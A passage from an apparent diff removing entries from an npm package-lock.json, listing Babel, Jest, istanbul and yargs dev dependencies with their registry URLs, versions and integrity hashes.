"https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.1.0.tgz", - "integrity": "sha512-6z3GW9x8G1gd+JIIgQQQxXuiJtCXeAjp6RaPEPLv62mH3iPHPxV6W3robxtCzNErRo6ZwTmzWhsbNvjyEBKzKA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "engines": { - "node": ">=10.12.0" - } - }, - "node_modules/v8-to-istanbul/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "dependencies": { - "makeerror": "1.0.12" - } - }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "node_modules/write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || >=16.0.0" - } - }, - "node_modules/y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "node_modules/yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true, - "engines": { - "node": ">=12" - } - }, - "node_modules/yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - } - }, - "dependencies": { - "@ampproject/remapping": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", - "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", - "dev": true, - "requires": { - "@jridgewell/gen-mapping": "^0.3.0", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", - "dev": true, - "requires": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/compat-data": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.22.6.tgz", - "integrity": "sha512-29tfsWTq2Ftu7MXmimyC0C5FDZv5DYxOZkh3XD3+QW4V/BYuv/LyEsjj3c0hqedEaDt6DBfDvexMKU8YevdqFg==", - "dev": true - }, - "@babel/core": { - "version": "7.22.8", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.22.8.tgz", - "integrity": "sha512-75+KxFB4CZqYRXjx4NlR4J7yGvKumBuZTmV4NV6v09dVXXkuYVYLT68N6HCzLvfJ+fWCxQsntNzKwwIXL4bHnw==", - "dev": true, - "requires": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.22.5", - "@babel/generator": "^7.22.7", - "@babel/helper-compilation-targets": "^7.22.6", - "@babel/helper-module-transforms": "^7.22.5", - "@babel/helpers": "^7.22.6", - "@babel/parser": "^7.22.7", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.8", - "@babel/types": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.2" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } - } - }, - "@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", - "dev": true, - "requires": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - } - }, - "@babel/helper-compilation-targets": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.22.6.tgz", - "integrity": "sha512-534sYEqWD9VfUm3IPn2SLcH4Q3P86XL+QvqdC7ZsFrzyyPF3T4XGiVghF6PTYNdWg6pXuoqXxNQAhbYeEInTzA==", - "dev": true, - "requires": { - "@babel/compat-data": "^7.22.6", - "@babel/helper-validator-option": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "browserslist": "^4.21.9", - "lru-cache": "^5.1.1" - } - }, - "@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true - }, - "@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "requires": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - } - }, - "@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-imports": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.22.5.tgz", - "integrity": "sha512-8Dl6+HD/cKifutF5qGd/8ZJi84QeAKh+CEe1sBzz8UayBBGg1dAIJrdHOcOM5b2MpzWL2yuotJTtGjETq0qjXg==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-transforms": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.22.5.tgz", - "integrity": "sha512-+hGKDt/Ze8GFExiVHno/2dvG5IdstpzCq0y4Qc9OJ25D4q3pKfiIP/4Vp3/JvhDkLKsDK2api3q3fpIgiIF5bw==", - "dev": true, - "requires": { - "@babel/helper-environment-visitor": "^7.22.5", - "@babel/helper-module-imports": "^7.22.5", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.5", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.5", - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-plugin-utils": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.22.5.tgz", - "integrity": "sha512-uLls06UVKgFG9QD4OeFYLEGteMIAa5kpTPcFL28yuCIIzsf6ZyKZMllKVOCZFhiZ5ptnwX4mtKdWCBE/uT4amg==", - "dev": true - }, - "@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": "sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", - "dev": true - }, - "@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true - }, - "@babel/helper-validator-option": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.22.5.tgz", - "integrity": "sha512-R3oB6xlIVKUnxNUxbmgq7pKjxpru24zlimpE8WK47fACIlM0II/Hm1RS8IaOI7NgCr6LNS+jl5l75m20npAziw==", - "dev": true - }, - "@babel/helpers": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.22.6.tgz", - "integrity": "sha512-YjDs6y/fVOYFV8hAf1rxd1QvR9wJe1pDBZ2AREKq/SDayfPzgk0PBnVuTCE5X1acEpMMNOVUqoe+OwiZGJ+OaA==", - "dev": true, - "requires": { - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.6", - "@babel/types": "^7.22.5" - } - }, - "@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", - "dev": true, - "requires": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", - "dev": true - }, - "@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.12.13" - } - }, - "@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-jsx": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.22.5.tgz", - "integrity": "sha512-gvyP4hZrgrs/wWMaocvxZ44Hw0b3W8Pe+cMxc8V1ULQ07oh8VNbIRaoD1LRZVTvD+0nieDKjfgKg89sD7rrKrg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.22.5" - } - }, - "@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-typescript": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.22.5.tgz", - "integrity": "sha512-1mS2o03i7t1c6VzH6fdQ3OA8tcEIxwG18zIPRp+UY1Ihv6W+XZzBCVxExF9upussPXJ0xE9XRHwMoNs1ep/nRQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.22.5" - } - }, - "@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" - } - }, - "@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - } - }, - "@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, - "requires": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - } - }, - "@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "requires": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - } - }, - "@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true - }, - "@jest/console": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.6.1.tgz", - "integrity": "sha512-Aj772AYgwTSr5w8qnyoJ0eDYvN6bMsH3ORH1ivMotrInHLKdUz6BDlaEXHdM6kODaBIkNIyQGzsMvRdOv7VG7Q==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0" - } - 